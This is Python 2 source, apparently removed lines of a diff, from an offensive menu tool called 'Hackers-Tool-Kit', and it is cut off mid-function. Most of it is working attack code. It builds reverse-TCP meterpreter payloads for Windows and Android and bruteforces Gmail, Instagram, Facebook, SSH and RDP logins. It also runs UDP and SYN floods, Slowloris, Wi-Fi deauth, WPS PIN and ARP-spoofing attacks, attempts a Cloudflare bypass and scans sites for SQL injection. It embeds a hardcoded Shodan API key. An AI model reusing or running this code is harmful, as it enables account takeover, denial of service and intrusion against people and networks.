-vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal Hackers-Tool-Kit -arpspoof: arp spoofing | -sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ -payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ -crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ -traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ -resa : reset account password ██║ ██║ ██║ ██║ ██╗ -resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -hashid : find the type of hash of a hash | -wafwoof : check a web application for firewall Hackers-Tool-Kit -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -terminal: open another new terminal -source : get source code from a website -dirscan : web directory scanner / bruteforce -aserver : start a apache server -run : run a file -\033[91m---------------------------------------------------------------------------------\033[0m - """ -#-----------------# -#HELP BANNER END# - - -#WINDOWS REVERSE TCP PAYLOAD START# -#---------------------------------# -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#WINDOWS REVERSE TCP PAYLOAD END# - - -#ANDROID REVERSE TCP PAYLOAD START# -#---------------------------------# -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#ANDROID REVERSE TCP PAYLOAD END# - -#GMAIL BRUTEFORCE START# -#----------------------# -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -#--------------------# -#GMAIL BRUTEFORCE END# - -#PORT SCAN START# -#---------------# -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -#-------------# -#PORT SCAN END# - -#INSTAGRAM BRUTEFORCE START# -#--------------------------# -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -#------------------------# -#INSTAGRAM BRUTEFORCE END# - -#FACEBOOK BRUTEFORCE START# -#-------------------------# -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -#-----------------------# -#FACEBOOK BRUTEFORCE END# - -#HOST TO IP START# -#----------------# -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -#--------------# -#HOST TO IP END# - -#YOUR OWN IP START# -#-----------------# -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" -#---------------# -#YOUR OWN IP END# - - -#AUTOMATED WIFI HACK START# -#-------------------------# -def wifite(): - os.system("wifite") -#-----------------------# -#AUTOMATED WIFI HACK END# - - -#MONITOR MODE START# -#------------------# -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -#----------------# -#MONITOR MODE END# - - -#DEVICES IN THE NET START# -#------------------------# -def netdev(): - os.system("netdiscover") -#----------------------# -#DEVICES IN THE NET END# - - -#NETS AROUND YOU START# -#-----------------------# -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -#---------------------# -#NETS AROUND YOU END# - - -#INFO SCAN HOST START# -#--------------------# -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -#------------------# -#INFO SCAN HOST END# - - -#INFO ON YOUR SYSTEM START# -#-------------------------# -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - print "\n" - os.system("iwconfig") - print "\n" - os.system("neofetch") - print "\n" - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" - print "\n" - show = 'macchanger -s {0}'.format(k) - os.system(show) -#-----------------------# -#INFO ON YOUR SYSTEM END# - - -#ALL METASPLOIT EXPLOITS START# -#-----------------------------# -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -#---------------------------# -#ALL METASPLOIT EXPLOITS END# - - -#UDP DOS START# -#-------------# -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -#-----------# -#UDP DOS END# - -#TCP FLOOD START# -#---------------# -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -#-------------# -#TCP FLOOD END# - - -#SYN FLOOD START# -#---------------# -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() -#-------------# -#SYN FLOOD END# - - -#PING A HOST START# -#-----------------# -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -#---------------# -#PING A HOST END# - - -#ALL METASPLOIT PAYLOADS START# -#-----------------------------# -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -#---------------------------# -#ALL METASPLOIT PAYLOADS END# - - -#ALL METASPLOIT AUX START# -#------------------------# -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -#----------------------# -#ALL METASPLOIT AUX END# - - -#START METASPLOIT HANDLER START# -#------------------------------# -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -#----------------------------# -#START METASPLOIT HANDLER END# - - -#ALL METASPLOIT MODS START# -#-------------------------# -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -#-----------------------# -#ALL METASPLOIT MODS END# - - -#HYDRA AUTOMATED START# -#---------------------# -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -#-------------------# -#HYDRA AUTOMATED END# - - -#WORDLIST MAKER START# -#--------------------# -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -#------------------# -#WORDLIST MAKER END# - - -#LIST FILES START# -#----------------# -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" -#--------------# -#LIST FILES END# - - -#MONITOR MODE OFF START# -#----------------------# -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -#--------------------# -#MONITOR MODE OFF END# - - -#TURN ON VPN START# -#-----------------# -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -#---------------# -#TURN ON VPN END# - - -#TURN OFF VPN START# -#------------------# -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -#----------------# -#TURN OFF VPN END# - - -#SLOW LORIS DOS START# -#--------------------# -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') -#------------------# -#SLOW LORIS DOS END# - - -#OPEN DOX WEBSITE START# -#----------------------# -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -#--------------------# -#OPEN DOX WEBSITE END# - - -#SCAN SPECIFIC NET START# -#-----------------------# -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -#---------------------# -#SCAN SPECIFIC NET END# - - -#DEFAULT WIFI PIN START# -#----------------------# -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -#--------------------# -#DEFAULT WIFI PIN END# - - -#WIFI PIN BRUTEFORCE START# -#-------------------------# -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -#-----------------------# -#WIFI PIN BRUTEFORCE END# - - -#DEAUTH ATTACK START# -#-------------------# -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -#-----------------# -#DEAUTH ATTACK END# - - -#MAC CHANGER START# -#-----------------# -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-----------------# -#MAC CHANGER START# - - -#MAC CHANGER OFF START# -#---------------------# -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-------------------# -#MAC CHANGER OFF END# - - -#ARP SPOOF START# -#---------------# -def arpspoof(): - print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" - h = raw_input("Targets: ") - os.system('echo "net.sniff on\n" >> arp.cap') - os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) - os.system('echo "arp.spoof on\n" >> arp.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet arp.cap") - os.system("rm arp.cap") -#-------------# -#ARP SPOOF END# - - -#SSL SCAN START# -#--------------# -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -#------------# -#SSL SCAN END# - - -#MAKE A PAYLOAD START# -#--------------------# -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - s = raw_input("File Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) - os.system(a) -#------------------# -#MAKE A PAYLOAD END# - - -#WORDLIST MAKER START# -#--------------------# -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -#------------------# -#WORDLIST MAKER END# - - -#INTERNET TRAFFIC START# -#----------------------# -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -#--------------------# -#INTERNET TRAFFIC END# - - -#RESET ACCOUNT PASSWORD START# -#----------------------------# -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -#--------------------------# -#RESET ACCOUNT PASSWORD END# - - -#RESET UNIX PASSWORD START# -#-------------------------# -def resu(): - j = 